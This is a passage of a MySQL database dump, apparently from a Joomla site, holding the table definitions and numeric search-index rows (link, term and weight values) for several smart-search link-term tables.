1682898,1.16669),(4927,1682899,1.26),(4927,1682900,0.42),(4927,1682901,1.16669),(4927,1682902,1.33),(4927,1682903,0.42),(4927,1682904,1.05),(4927,1682905,1.16669),(4927,1683203,0.88669),(4927,1683204,1.14331),(4927,1683205,0.88669),(4927,1683206,1.05),(4927,1683207,0.95669),(4927,1683208,1.12),(4927,1683209,0.88669),(4927,1683210,1.05),(4927,1683211,1.86655),(4927,1683212,0.98),(4927,1683213,1.05),(4927,1683214,0.95669),(4927,1683215,1.16669),(4927,1683216,1.02669),(4927,1683217,1.23669),(4927,1683218,1.02669),(4927,1683219,1.16669),(4927,1683220,1.02669),(4927,1683221,1.16669),(4927,1683222,0.46669),(4927,1683223,1.23669),(4927,1683224,1.37669),(4927,1683225,0.18669),(4927,1683226,0.98),(4927,1683227,1.05),(4930,1683782,3.3334),(4931,1683813,3.3334),(4934,1683967,2.66339),(4934,1683968,3.11661),(4934,1683969,0.23331),(4934,1683970,0.95669),(4934,1683971,1.12),(4938,1686234,0.23331),(4938,1686235,1.00331),(4938,1686236,1.12),(4938,1686237,2.49339),(4938,1686238,3.00339),(4938,1686239,1.07331),(4938,1686240,1.30669),(4938,1686241,0.79331),(4938,1686242,0.95669),(4938,1686243,1.02669),(4938,1686244,0.88669),(4938,1686245,1.02669),(4938,1686246,0.32669),(4938,1686247,0.91),(4938,1686248,0.98),(4938,1686249,0.42),(4938,1686250,1.14331),(4938,1686251,1.4),(4938,1686252,0.46669),(4938,1686253,1.02669),(4938,1686254,1.28331),(4938,1686255,0.7),(4940,1686255,0.7),(4938,1686256,1.14331),(4938,1686257,1.37669),(4938,1686258,0.37331),(4940,1686258,0.74662),(4938,1686259,1.00331),(4938,1686260,1.19),(4938,1686563,0.23331),(4938,1686564,1.02669),(4938,1686565,1.33),(4938,1686566,0.18669),(4938,1686567,1.02669),(4938,1686568,1.28331),(4938,1686569,0.28),(4940,1686569,0.28),(4938,1686570,0.95669),(4940,1686570,0.95669),(4938,1686571,1.07331),(4940,1686571,1.07331),(4938,1686572,1.05),(4938,1686573,1.26),(4938,1686574,0.37331),(4940,1686574,0.37331),(4938,1686575,1.12),(4940,1686575,1.12),(4938,1686576,1.23669),(4940,1686576,1.23669),(4938,1686577,0.46669),(4940,1686577,0.46669),(4938,1686578,1.09669),(4938,1686579,1.35331),(4940,1688170,0.37338),(4940,1688171,1.77338),(4940,1688172,1.12),(4940,1688173,1.05),(4940,1688174,2.6668),(4940,1688175,5.6),(4940,1688176,6.6668),(4940,1688309,1.4),(4940,1688310,1.4),(4940,1688311,0.91),(4940,1688312,1.02669),(4940,1688313,1.86662),(4940,1688314,0.98),(4940,1688315,1.05),(4940,1688316,1.00331),(4940,1688317,1.09669),(4940,1688318,0.42),(4940,1688319,1.14331),(4940,1688320,1.21331),(4940,1688321,1.4),(4940,1688322,1.16669),(4940,1688323,1.4),(4940,1688324,1.35331),(4940,1688325,1.4),(4940,1688326,1.16669),(4940,1688327,1.21331),(4940,1688328,2.19338),(4940,1688329,1.35331),(4940,1688330,1.21331),(4940,1688331,0.37331),(4940,1688332,0.95669),(4940,1688333,1.21331),(4940,1688672,0.84),(4940,1688673,0.95669),(4940,1688674,0.88669),(4940,1688675,1.00331),(4940,1688676,1.00331),(4940,1688677,0.37331),(4940,1688678,0.93331),(4940,1688679,1.16669),(4940,1688680,0.23331),(4940,1688681,1.05),(4940,1688682,1.33),(4940,1688683,0.46669),(4940,1688684,1.21331),(4940,1688685,1.4),(4940,1688686,1.19),(4940,1688687,1.30669),(4946,1689272,2.6666),(4946,1689273,3.0666),(4947,1689287,2.8),(4948,1689287,2.8),(4949,1689287,2.8),(4947,1689288,3.4),(4948,1689288,3.4),(4949,1689288,3.4),(4954,1689438,2.9334),(4954,1689439,3.4666),(4955,1689466,0.91),(4955,1689467,1.21331),(4955,1689468,1.4),(4955,1689477,1.21331),(4955,1689478,1.4),(4957,1689522,2.55),(4957,1689523,3.00339);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms2` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms3`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms3`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms3` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms3`
--

LOCK TABLES `fw3gt_finder_links_terms3` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms3` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms3` VALUES (4604,1529477,0.51331),(4608,1529477,0.51331),(4614,1529477,0.51331),(4617,1529477,0.51331),(4625,1529477,0.51331),(4604,1529478,1.09669),(4608,1529478,1.09669),(4614,1529478,1.09669),(4617,1529478,1.09669),(4625,1529478,1.09669),(4604,1529479,1.28331),(4608,1529479,1.28331),(4614,1529479,1.28331),(4617,1529479,1.28331),(4625,1529479,1.28331),(4624,1553831,0.21),(4624,1553832,0.81669),(4624,1553833,1.05),(4625,1555467,0.51331),(4625,1555468,1.12),(4625,1555469,1.26),(4693,1569254,0.28),(4693,1569255,1.05),(4693,1569256,1.19),(4924,1680541,0.2668),(4940,1680541,0.2668),(4924,1680542,4.9332),(4924,1680543,6.4),(4940,1688167,5.2),(4940,1688168,6.4);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms3` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms4`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms4`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms4` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms4`
--

LOCK TABLES `fw3gt_finder_links_terms4` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms4` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms4` VALUES (4723,1523586,1.0666),(4764,1523586,1.0666),(4837,1523586,2.1332),(4850,1523586,2.1332),(4928,1523586,2.1332),(4951,1523586,2.1332),(4723,1523587,3.2666),(4764,1523587,3.2666),(4837,1523587,6.5332),(4850,1523587,6.5332),(4928,1523587,6.5332),(4951,1523587,6.5332),(4723,1523588,3.6),(4764,1523588,3.6),(4723,1523602,0.9334),(4764,1523602,0.9334),(4723,1523603,2.6666),(4764,1523603,2.6666),(4723,1523604,2.9334),(4764,1523604,2.9334),(4653,1523605,0.5334),(4723,1523605,0.5334),(4735,1523605,0.5334),(4736,1523605,0.5334),(4753,1523605,0.5334),(4764,1523605,0.5334),(4780,1523605,0.5334),(4799,1523605,0.5334),(4806,1523605,0.5334),(4814,1523605,1.0668),(4837,1523605,1.0668),(4850,1523605,1.0668),(4928,1523605,1.0668),(4929,1523605,1.0668),(4938,1523605,2.1336),(4723,1523618,0.90661),(4764,1523618,0.90661),(4850,1523618,0.90661),(4928,1523618,0.90661),(4951,1523618,0.90661),(4723,1523619,2.43661),(4764,1523619,2.43661),(4723,1523620,2.89),(4764,1523620,2.89),(4732,1523798,0.14),(4538,1523798,0.17),(4723,1523798,0.37),(4569,1524757,1.0666),(4569,1524758,3.1334),(4569,1524759,0.14),(4572,1524759,0.14),(4661,1524759,0.14),(4736,1524759,0.14),(4780,1524759,0.14),(4927,1524759,0.14),(4803,1524759,0.28),(4849,1524759,0.28),(4571,1524759,0.42),(4940,1524759,0.42),(4569,1524760,0.91),(4572,1524760,0.91),(4661,1524760,0.91),(4571,1524760,2.73),(4569,1524761,0.95669),(4572,1524761,0.95669),(4661,1524761,0.95669),(4571,1524761,2.87007),(4569,1524783,0.32669),(4572,1524783,0.32669),(4661,1524783,0.32669),(4571,1524783,0.98007),(4569,1524784,0.95669),(4572,1524784,0.95669),(4661,1524784,0.95669),(4571,1524784,2.87007),(4569,1524785,1.09669),(4572,1524785,1.09669),(4661,1524785,1.09669),(4571,1524785,3.29007),(4569,1524789,0.37331),(4571,1524789,0.37331),(4572,1524789,0.37331),(4661,1524789,0.37331),(4669,1524789,0.37331),(4741,1524789,0.37331),(4749,1524789,0.37331),(4753,1524789,0.37331),(4839,1524789,0.37331),(4847,1524789,0.37331),(4851,1524789,0.37331),(4852,1524789,0.37331),(4857,1524789,0.37331),(4569,1524790,1.07331),(4571,1524790,1.07331),(4572,1524790,1.07331),(4661,1524790,1.07331),(4669,1524790,1.07331),(4741,1524790,1.07331),(4749,1524790,1.07331),(4753,1524790,1.07331),(4839,1524790,1.07331),(4847,1524790,1.07331),(4851,1524790,1.07331),(4852,1524790,1.07331),(4857,1524790,1.07331),(4569,1524791,1.21331),(4571,1524791,1.21331),(4572,1524791,1.21331),(4661,1524791,1.21331),(4749,1524791,1.21331),(4753,1524791,1.21331),(4839,1524791,1.21331),(4847,1524791,1.21331),(4851,1524791,1.21331),(4852,1524791,1.21331),(4857,1524791,1.21331),(4571,1524952,0.23331),(4571,1524953,0.95669),(4571,1524954,1.09669),(4571,1524970,0.45339),(4669,1524970,0.45339),(4571,1524971,2.38),(4572,1525012,1.7334),(4572,1525013,3.2666),(4572,1525014,3.8),(4574,1525113,0.68),(4574,1525114,2.32339),(4593,1527367,1.4666),(4593,1527368,3.2666),(4593,1527369,3.6666),(4593,1527381,0.56661),(4594,1527508,0.28),(4849,1527508,0.28),(4734,1527508,0.56),(4594,1527509,0.98),(4594,1527510,1.12),(4594,1527511,0.23331),(4594,1527512,0.91),(4594,1527513,1.21331),(4604,1535947,0.42),(4604,1535948,1.00331),(4604,1535949,1.23669),(4604,1535950,0.42),(4604,1535951,1.00331),(4604,1535952,1.28331),(4604,1535953,0.37331),(4604,1535954,0.93331),(4604,1535955,1.14331),(4604,1535995,0.46669),(4604,1535996,1.02669),(4604,1535997,1.19),(4604,1536076,0.37331),(4604,1536077,0.93331),(4604,1536078,1.07331),(4604,1536079,0.7),(4604,1536080,1.19),(4604,1536081,1.4),(4608,1540089,0.14),(4608,1540090,0.81669),(4608,1540091,1.00331),(4608,1540121,0.79339),(4608,1540122,2.55),(4608,1540123,2.77661),(4608,1540124,0.28),(4608,1540125,0.88669),(4608,1540126,0.95669),(4608,1540127,0.14),(4710,1540127,0.14),(4803,1540127,0.14),(4927,1540127,0.14),(4798,1540127,0.28),(4608,1540128,0.91),(4608,1540129,0.98),(4608,1540130,0.32669),(4608,1540131,0.98),(4608,1540132,1.05),(4608,1540133,0.23331),(4608,1540134,0.91),(4608,1540135,1.12),(4608,1540641,0.18669),(4608,1540642,0.88669),(4608,1540643,0.95669),(4614,1546284,0.23331),(4614,1546285,0.95669),(4614,1546286,1.07331),(4614,1546287,0.18669),(4721,1546287,0.18669),(4614,1546288,0.95669),(4614,1546289,1.00331),(4614,1546290,0.42),(4614,1546291,1.00331),(4614,1546292,1.14331),(4614,1547092,0.65331),(4614,1547093,1.12),(4614,1547094,1.19),(4616,1547712,0.60669),(4616,1547713,1.21331),(4616,1547714,1.4),(4616,1547715,0.18669),(4626,1547715,0.18669),(4616,1547716,1.02669),(4616,1547717,1.21331),(4616,1547718,0.51331),(4616,1547719,1.16669),(4616,1547720,1.35331),(4617,1548250,0.23331),(4734,1548250,0.23331),(4617,1548251,1.07331),(4617,1548252,1.37669),(4617,1548476,0.28),(4617,1548477,0.88669),(4617,1548478,1.07331),(4617,1548479,0.46669),(4617,1548480,1.21331),(4617,1548481,1.26),(4624,1553908,0.51331),(4624,1553909,1.05),(4624,1553910,1.33),(4624,1554020,1.11993),(4624,1554021,1.14331),(4624,1554022,1.23669),(4624,1554023,1.16669),(4624,1554024,1.26),(4624,1554025,0.93331),(4624,1554026,1.19),(4624,1554027,0.23331),(4624,1554028,0.91),(4624,1554029,1.23669),(4624,1554030,0.60669),(4624,1554031,1.35331),(4624,1554032,1.4),(4624,1554033,0.32669),(4624,1554034,1.16669),(4624,1554035,1.4),(4624,1554036,0.28),(4624,1554037,0.95669),(4624,1554038,1.07331),(4626,1554174,0.04669),(4624,1554174,0.09338),(4798,1554174,0.56028),(4624,1554175,0.81669),(4624,1554176,0.86331),(4624,1554177,0.98),(4624,1554178,1.35331),(4624,1554179,0.09331),(4626,1554179,0.09331),(4624,1554180,1.02669),(4624,1554181,1.19),(4624,1554182,0.28),(4798,1554182,0.56),(4624,1554183,0.93331),(4624,1554184,1.14331),(4624,1554185,1.09669),(4624,1554186,1.28331),(4624,1554467,0.23331),(4798,1554467,0.23331),(4624,1554468,1.05),(4624,1554469,1.09669),(4625,1554939,0.18669),(4625,1554940,1.09669),(4625,1554941,1.16669),(4625,1554942,0.32669),(4625,1554943,1.07331),(4625,1554944,1.16669),(4625,1554945,0.32669),(4625,1554946,1.19),(4625,1554947,1.26),(4626,1555998,1.05),(4626,1555999,1.14331),(4626,1556130,0.42),(4626,1556131,1.09669),(4626,1556132,1.4),(4626,1556133,0.28),(4626,1556134,0.93331),(4626,1556135,1.16669),(4626,1556136,0.60669),(4626,1556137,1.19),(4626,1556138,1.37669),(4626,1556139,0.60669),(4626,1556140,1.12),(4626,1556141,1.21331),(4626,1556142,0.23331),(4626,1556143,0.88669),(4626,1556144,0.95669),(4626,1556145,0.42),(4626,1556146,1.09669),(4626,1556147,1.35331),(4626,1556148,0.51331),(4626,1556149,1.16669),(4626,1556150,1.23669),(4626,1556151,0.7),(4626,1556152,1.37669),(4626,1556153,1.4),(4626,1556154,0.90661),(4626,1556386,0.98),(4626,1556387,1.21331),(4626,1556388,1.05),(4626,1556389,1.21331),(4626,1556867,0.09331),(4721,1556867,0.09331),(4710,1556867,0.18662),(4940,1556867,0.18662),(4803,1556867,0.31992),(4734,1556867,0.37324),(4626,1556868,1.14331),(4626,1556869,1.4),(4669,1559069,0.18669),(4749,1559069,0.18669),(4753,1559069,0.18669),(4851,1559069,0.18669),(4852,1559069,0.18669),(4849,1559069,1.01346),(4653,1560598,0.5334),(4664,1560598,0.5334),(4732,1560598,0.5334),(4761,1560598,0.5334),(4762,1560598,0.5334),(4653,1560599,2.4666),(4653,1560600,2.7334),(4653,1560601,2.4666),(4653,1560602,2.9334),(4653,1560630,0.5334),(4735,1560630,0.5334),(4653,1560631,2.6666),(4653,1560632,3.0666),(4653,1560633,0.8),(4653,1560634,3.2666),(4653,1560635,4),(4653,1560711,0.34),(4687,1560711,0.34),(4658,1562933,0.14),(4658,1562934,0.84),(4658,1562935,0.98),(4658,1562960,0.51331),(4658,1562961,1.12),(4658,1562962,1.23669),(4658,1562963,0.56),(4658,1562964,1.05),(4658,1562965,1.35331),(4658,1562966,0.46669),(4658,1562967,1.07331),(4658,1562968,1.35331),(4669,1563377,1.28331),(4678,1564185,0.8),(4669,1564744,0.23331),(4669,1564745,0.93331),(4669,1564746,1.05),(4669,1564759,0.88669),(4669,1564760,1.16669),(4672,1564834,1.2),(4672,1564835,3.4666),(4678,1565363,0.5334),(4678,1565364,3.2),(4678,1565365,3.6666),(4678,1565366,3.3334),(4678,1565367,3.8666),(4687,1568597,0.4),(4803,1568597,0.4),(4687,1568598,2.8),(4687,1568599,3.4666),(4687,1568603,0.90661),(4687,1568611,2.04),(4687,1568612,2.60661),(4710,1584096,0.46669),(4721,1584096,3.00015),(4710,1585149,0.14),(4721,1585149,0.14),(4710,1585162,0.23331),(4734,1585162,0.23331),(4917,1585162,0.23331),(4938,1585162,0.23331),(4721,1585162,0.46662),(4710,1592209,0.23331),(4710,1592210,1.02669),(4710,1592211,1.23669),(4710,1592212,0.98),(4710,1592213,1.16669),(4710,1592214,0.42),(4710,1592215,1.09669),(4710,1592216,1.14331),(4710,1592217,1.19),(4710,1592218,1.35331),(4710,1592729,0.46669),(4710,1592730,1.05),(4710,1592731,1.30669),(4710,1592732,0.46669),(4710,1592733,1.09669),(4710,1592734,0.42),(4710,1592735,0.98),(4710,1592736,1.14331),(4710,1592737,0.86331),(4710,1592738,0.98),(4710,1592739,0.88669),(4710,1592740,1.12),(4710,1592741,0.88669),(4710,1592742,1.09669),(4710,1592743,0.95669),(4710,1592744,1.05),(4721,1602898,0.21),(4721,1602899,0.88669),(4721,1602900,1.14331),(4721,1603005,0.93331),(4721,1603006,1.02669),(4721,1603007,0.42),(4721,1603008,1.09669),(4721,1603009,1.30669),(4721,1603010,0.28),(4721,1603011,1.00331),(4721,1603012,1.07331),(4721,1603013,0.09331),(4721,1603014,0.95669),(4721,1603015,1.02669),(4721,1603016,0.18669),(4721,1603017,0.86331),(4721,1603018,1.07331),(4721,1603019,1.00331),(4721,1603020,1.16669),(4721,1603021,1.05),(4721,1603022,1.16669),(4721,1603023,1.12),(4721,1603024,1.37669),(4721,1603025,2.43661),(4721,1603026,3.06),(4721,1603027,0.98),(4721,1603028,1.26),(4721,1603029,0.7),(4721,1603030,1.19),(4721,1603031,1.4),(4721,1603032,0.46669),(4721,1603033,1.09669),(4721,1603034,1.30669),(4721,1603035,0.60669),(4721,1603036,1.21331),(4721,1603037,1.4),(4721,1603038,0.37338),(4721,1603039,1.00331),(4721,1603040,1.07331),(4721,1603041,0.93331),(4721,1603042,1.00331),(4721,1603043,0.46662),(4721,1603044,1.96),(4721,1603045,1.09669),(4721,1603046,1.05),(4721,1603047,0.18669),(4721,1603048,0.86331),(4721,1603049,1.05),(4721,1603050,0.14),(4721,1603051,1.00331),(4721,1603052,1.14331),(4721,1603053,0.56007),(4721,1603054,0.84),(4721,1603055,1.02669),(4721,1603056,1.07331),(4721,1603057,1.28331),(4721,1603058,0.84),(4721,1603059,1.02669),(4721,1603060,0.18669),(4721,1603061,1.00331),(4721,1603062,1.14331),(4721,1603063,0.18669),(4734,1603063,0.18669),(4721,1603064,0.84),(4721,1603065,1.12),(4721,1604037,0.37331),(4721,1604038,1.02669),(4721,1604039,1.21331),(4721,1604040,0.81669),(4734,1604040,0.81669),(4721,1604041,0.86331),(4721,1604042,1.02669),(4721,1604043,1.19),(4721,1604044,0.56),(4721,1604045,2.00662),(4721,1604046,1.12),(4721,1604047,1.26),(4721,1604048,0.37331),(4721,1604049,1.02669),(4721,1604050,1.09669),(4721,1604051,0.14),(4938,1604051,0.14),(4721,1604052,0.91),(4721,1604053,1.21331),(4721,1604054,1.82),(4721,1604055,1.14331),(4721,1604056,1.05),(4723,1604953,2.7334),(4723,1604954,3.0666),(4723,1604955,2.21),(4723,1604956,2.49339),(4732,1613351,0.98),(4732,1613352,1.16669),(4732,1613353,0.93331),(4732,1613354,1.05),(4732,1613364,2.4666),(4732,1613365,3.0666),(4732,1613402,0.42),(4732,1613403,0.95669),(4732,1613404,1.21331),(4732,1613405,0.60669),(4732,1613406,0.28),(4761,1613406,0.28),(4732,1613407,0.98),(4761,1613407,0.98),(4732,1613408,1.23669),(4761,1613408,1.23669),(4734,1615885,0.2666),(4734,1615886,2.3334),(4734,1615887,2.9334),(4734,1616026,0.28),(4734,1616027,0.93331),(4734,1616028,1.09669),(4734,1616029,0.37331),(4734,1616030,1.14331),(4734,1616031,1.23669),(4734,1616032,1.00331),(4734,1616033,1.28331),(4734,1616034,0.42),(4849,1616034,0.42),(4734,1616035,1.14331),(4734,1616036,1.23669),(4734,1616037,1.02669),(4734,1616038,1.23669),(4734,1616039,0.95669),(4734,1616040,1.12),(4734,1616041,0.28),(4734,1616042,0.98),(4734,1616043,1.02669),(4734,1616044,0.32669),(4734,1616045,0.98),(4734,1616046,1.12),(4734,1616047,0.51331),(4734,1616048,1.00331),(4734,1616049,1.21331),(4734,1616050,0.28),(4734,1616051,1.12),(4734,1616052,1.21331),(4734,1616053,0.28),(4734,1616054,1.00331),(4734,1616055,1.07331),(4734,1616056,0.51331),(4761,1616056,0.51331),(4734,1616057,1.12),(4734,1616058,1.21331),(4938,1616059,0.18669),(4940,1616059,0.18669),(4734,1616059,0.37338),(4734,1616060,0.84),(4734,1616061,0.98),(4734,1616062,1.07331),(4734,1616063,1.16669),(4917,1616064,0.28),(4927,1616064,0.28),(4734,1616064,1.12),(4734,1616065,0.91),(4734,1616066,1.09669),(4734,1616067,1.09669),(4734,1616068,1.14331),(4734,1616069,1.09669),(4734,1616070,1.14331),(4734,1616071,1.00331),(4734,1616072,1.19),(4734,1616073,0.95669),(4734,1616074,1.02669),(4734,1616075,0.46669),(4734,1616076,1.16669),(4734,1616077,1.30669),(4734,1616078,0.37331),(4734,1616079,0.93331),(4734,1616080,1.00331),(4917,1617646,0.09331),(4734,1617646,0.18662),(4734,1617647,0.91),(4734,1617648,1.05),(4734,1617649,0.88669),(4734,1617650,1.05),(4734,1617651,0.84),(4734,1617652,1.19),(4734,1617653,0.93331),(4734,1617654,1.00331),(4734,1617655,1.02669),(4734,1617656,0.86331),(4734,1617657,1.14331),(4734,1617658,0.86331),(4734,1617659,0.95669),(4735,1617915,2.8),(4735,1617916,3.1334),(4735,1617937,2.7334),(4735,1617938,3.2),(4736,1618014,0.84),(4780,1618014,0.84),(4927,1618014,0.84),(4803,1618014,1.68),(4849,1618014,1.68),(4940,1618014,2.52),(4736,1618030,2.4),(4736,1618031,2.9334),(4736,1618032,0.9334),(4736,1618033,3.4666),(4762,1620305,1.02662),(4761,1620305,3.59317),(4761,1620310,0.37331),(4762,1620310,0.37331),(4761,1620313,4.61979),(4762,1620313,5.64641),(4762,1620331,6.16),(4761,1620331,8.4),(4761,1620342,1.21331),(4762,1620342,2.42662),(4761,1620343,1.35331),(4762,1620343,2.70662),(4762,1620344,1.07331),(4761,1620344,3.21993),(4741,1621224,1.28331),(4749,1623528,0.88669),(4851,1623528,0.88669),(4749,1623529,1.16669),(4851,1623529,1.16669),(4753,1623649,0.88669),(4852,1623649,0.88669),(4753,1623650,1.16669),(4761,1626283,0.14),(4761,1626284,0.79331),(4761,1626285,1.02669),(4761,1626286,0.14),(4761,1626287,0.88669),(4761,1626288,0.93331),(4761,1626363,0.51331),(4761,1626364,1.12),(4761,1626365,1.4),(4761,1626366,0.23331),(4761,1626367,1.00331),(4761,1626368,1.21331),(4761,1626369,1.07331),(4761,1626370,1.12),(4761,1626371,1.00331),(4761,1626372,1.14331),(4761,1626373,2.42662),(4761,1626374,2.8),(4761,1626375,1.12),(4761,1626376,1.33),(4761,1626377,2.1),(4761,1626378,1.35331),(4761,1626379,1.21331),(4761,1626380,1.12),(4761,1626381,1.21331),(4761,1626382,1.16669),(4761,1626383,1.35331),(4761,1626384,1.30669),(4761,1626385,1.4),(4761,1626386,1.21331),(4761,1626387,1.4),(4761,1626388,1.23669),(4761,1626389,1.4),(4761,1626390,1.21331),(4761,1626391,1.4),(4761,1626392,1.23669),(4761,1626393,1.4),(4761,1626394,1.19),(4761,1626395,1.26),(4761,1626396,2.1),(4761,1626397,1.19),(4761,1626398,1.35331),(4761,1626399,2.1),(4761,1626400,1.4),(4761,1626401,1.37669),(4761,1626402,1.19),(4761,1626403,1.4),(4761,1626404,1.4),(4761,1626405,1.4),(4761,1626406,1.05),(4761,1626407,1.28331),(4761,1626408,1.21331),(4761,1626409,1.4),(4761,1626410,1.26),(4761,1626411,1.33),(4761,1626412,1.07331),(4761,1626413,1.26),(4761,1626414,1.21331),(4761,1626415,1.28331),(4761,1626416,1.30669),(4761,1626417,2.52),(4761,1626418,1.16669),(4761,1626419,1.4),(4761,1626420,1.16669),(4761,1626421,1.4),(4761,1626422,0.28),(4761,1626423,1.00331),(4761,1626424,1.26),(4761,1626425,1.09669),(4761,1626426,1.35331),(4761,1626427,0.84),(4761,1626428,2.1),(4761,1626429,2.61338),(4761,1627436,0.18669),(4761,1627437,0.93331),(4761,1627438,1.19),(4762,1628061,0.56),(4762,1628062,1.02669),(4762,1628063,1.19),(4762,1628064,1.12),(4762,1628065,1.16669),(4762,1628066,1.7334),(4762,1628067,3.7334),(4762,1628068,4),(4762,1628107,0.74662),(4762,1628108,1.12),(4762,1628109,1.26),(4762,1628110,1.14331),(4762,1628111,1.23669),(4762,1628112,1.00331),(4762,1628113,1.12),(4762,1628114,1.21331),(4762,1628115,1.4),(4762,1628116,1.12),(4762,1628117,1.35331),(4762,1628118,1.14331),(4762,1628119,1.35331),(4762,1628120,1.26),(4762,1628121,1.35331),(4762,1628122,1.28331),(4762,1628123,1.37669),(4762,1628124,1.19),(4762,1628125,1.4),(4762,1628126,1.07331),(4762,1628127,1.37669),(4762,1628128,1.26),(4762,1628129,1.4),(4762,1628130,2.1),(4762,1628131,1.30669),(4762,1628132,1.28331),(4762,1628133,3.63993),(4762,1628134,4.2),(4762,1628135,1.19),(4762,1628136,1.30669),(4762,1628137,1.23669),(4762,1628138,1.33),(4762,1628139,2.1),(4762,1628140,2.61338),(4762,1628141,1.26),(4762,1628142,1.35331),(4762,1628143,1.07331),(4762,1628144,1.35331),(4762,1628145,1.16669),(4762,1628146,1.23669),(4762,1628147,1.4),(4762,1628148,1.23669),(4762,1628149,1.4),(4762,1628150,0.32669),(4762,1628151,1.07331),(4762,1628152,1.12),(4762,1628672,0.23331),(4762,1628673,1.23669),(4762,1628674,1.4),(4766,1629121,0.6666),(4955,1629121,0.6666),(4766,1629122,2.8),(4955,1629122,2.8),(4770,1629210,0.6666),(4773,1629275,0.6666),(4776,1629334,1.4666),(4776,1629335,3.1334),(4777,1629404,0.46662),(4777,1629405,0.86331),(4777,1629406,1.02669),(4777,1629407,0.98),(4777,1629408,1.19),(4777,1629409,0.51331),(4777,1629410,1.09669),(4777,1629411,1.14331),(4777,1629412,0.23331),(4777,1629413,1.02669),(4777,1629414,1.23669),(4777,1629415,0.28),(4777,1629416,0.98),(4777,1629417,1.16669),(4777,1629418,0.28),(4777,1629419,0.18669),(4777,1629420,0.98),(4777,1629421,1.07331),(4777,1629422,0.45339),(4777,1629423,2.09661),(4777,1629424,2.43661),(4777,1629425,0.32669),(4777,1629426,1.00331),(4777,1629427,1.16669),(4777,1629794,0.28),(4777,1629795,1.00331),(4777,1629796,1.19),(4778,1629864,0.8),(4849,1629972,0.37338),(4780,1629972,0.45339),(4849,1629973,0.86331),(4780,1629973,2.09661),(4780,1629974,2.66339),(4798,1643151,0.21),(4798,1643152,0.93331),(4798,1643153,1.02669),(4798,1643175,0.60669),(4798,1643176,1.21331),(4798,1643177,1.4),(4798,1643178,0.60669),(4798,1643179,1.28331),(4798,1643180,1.4),(4798,1643181,0.7),(4798,1643182,1.21331),(4798,1643183,1.4),(4798,1643184,0.65331),(4798,1643185,1.28331),(4798,1643186,1.35331),(4798,1643187,2.05338),(4798,1643188,1.07331),(4798,1643189,1.12),(4798,1643190,0.65338),(4798,1643191,1.02669),(4798,1643192,1.33),(4798,1643193,1.07331),(4798,1643194,1.26),(4798,1643195,0.32669),(4798,1643196,0.95669),(4798,1643197,1.07331),(4798,1643361,1.02669),(4798,1643362,1.28331),(4798,1643363,1.05),(4798,1643364,1.33),(4798,1643365,1.07331),(4798,1643366,1.33),(4798,1643367,1.14331),(4798,1643368,1.4),(4798,1643369,1.02669),(4798,1643370,1.28331),(4798,1643371,1.05),(4798,1643372,1.28331),(4798,1643373,0.91),(4798,1643374,1.12),(4798,1643375,0.95669),(4798,1643376,1.12),(4798,1643377,2.52),(4798,1643378,0.91),(4798,1643379,1.05),(4798,1643380,1.02669),(4798,1643381,0.88669),(4798,1643382,1.07331),(4798,1643383,0.81669),(4798,1643384,0.93331),(4798,1643385,1.05),(4798,1643386,1.09669),(4798,1643387,2.05338),(4798,1643388,2.14662),(4798,1643389,0.46669),(4798,1643390,1.14331),(4798,1643391,1.33),(4798,1643392,0.60669),(4798,1643393,1.37669),(4798,1643394,1.4),(4798,1643395,0.46669),(4798,1643396,1.26),(4798,1643397,1.4),(4798,1643398,0.74662),(4798,1643399,1.21331),(4798,1643400,1.4),(4798,1643401,1.09669),(4798,1643402,1.14331),(4798,1643403,0.56),(4798,1643404,1.16669),(4798,1643405,1.26),(4798,1643406,0.37331),(4798,1643407,1.16669),(4798,1643408,1.4),(4798,1643799,1.02669),(4798,1643800,1.23669),(4803,1644907,0.6666),(4803,1644908,2.6),(4803,1644909,3.0666),(4803,1644910,0.98),(4803,1644931,2.7334),(4803,1644932,3.6666),(4803,1644956,0.95669),(4803,1644957,1.14331),(4803,1644958,0.32669),(4803,1644959,1.00331),(4803,1644960,1.16669),(4803,1644961,0.65331),(4803,1644962,1.26),(4803,1644963,1.4),(4803,1645127,2.21),(4803,1645128,0.88669),(4803,1645129,1.07331),(4806,1645277,0.79339),(4813,1645277,0.79339),(4814,1645277,0.79339),(4806,1645278,2.38),(4814,1645278,2.38),(4806,1645279,2.66339),(4814,1645279,2.66339),(4808,1645359,1.24661),(4808,1645360,2.66339),(4813,1645522,2.21),(4813,1645523,2.60661),(4814,1645590,3.0666),(4814,1645591,3.6),(4814,1645592,2.8),(4814,1645593,3.6),(4837,1646505,7.0668),(4850,1646505,7.0668),(4928,1646505,7.0668),(4951,1646505,7.0668),(4849,1646934,1.00331),(4849,1646945,1.6),(4849,1646946,6.1332),(4849,1646947,6.9332),(4849,1646993,1.12),(4849,1646994,1.33),(4849,1646995,0.91),(4849,1646996,1.00331),(